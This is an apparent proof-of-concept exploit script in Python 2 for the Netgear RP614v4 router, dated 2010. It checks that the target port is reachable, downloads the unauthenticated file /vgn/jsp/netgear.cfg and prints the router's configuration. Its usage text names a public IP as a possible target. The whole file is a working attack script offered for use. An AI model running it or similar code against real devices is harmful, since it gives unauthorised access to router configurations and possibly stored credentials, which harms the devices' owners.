#!/usr/bin/env python
#RP614v4 Exploit
#Tested on Firmware version: v1.1.2_09.01 (Newest as of Wed Mar 24, 2010
#Author: Kyle Young
import urllib2
import sys
import socket

def listhelp():
	print "Please invoke this program with an IP and port" 
	print "Example: python rp614v4exploit.py 192.168.1.1 80"
	print "Example: python rp614v4exploit.py [public ip] 8080"
	sys.exit(1) 

if len(sys.argv) < 3:
	listhelp()

host = sys.argv[1] 
port = sys.argv[2]
port = int(port)

try:
	con = socket.socket()
	con.settimeout(0.25)
	con.connect((host, port))
	con.close()
except socket.error:
	con.close()
	print "Port appears to be closed on this host.."
	sys.exit(1)


exploit = "http://%s:%d/vgn/jsp/netgear.cfg" % (sys.argv[1], port)  #Yes.. I know I see it..#
try:
	request = urllib2.urlopen(exploit)
	config = request.read()
	print config
	sys.exit(0)
except urllib2.HTTPError:
	print "I could not download the netgear.cfg file, make sure you have the right address or the router may have had a fix/patch applied to it"
	sys.exit(1)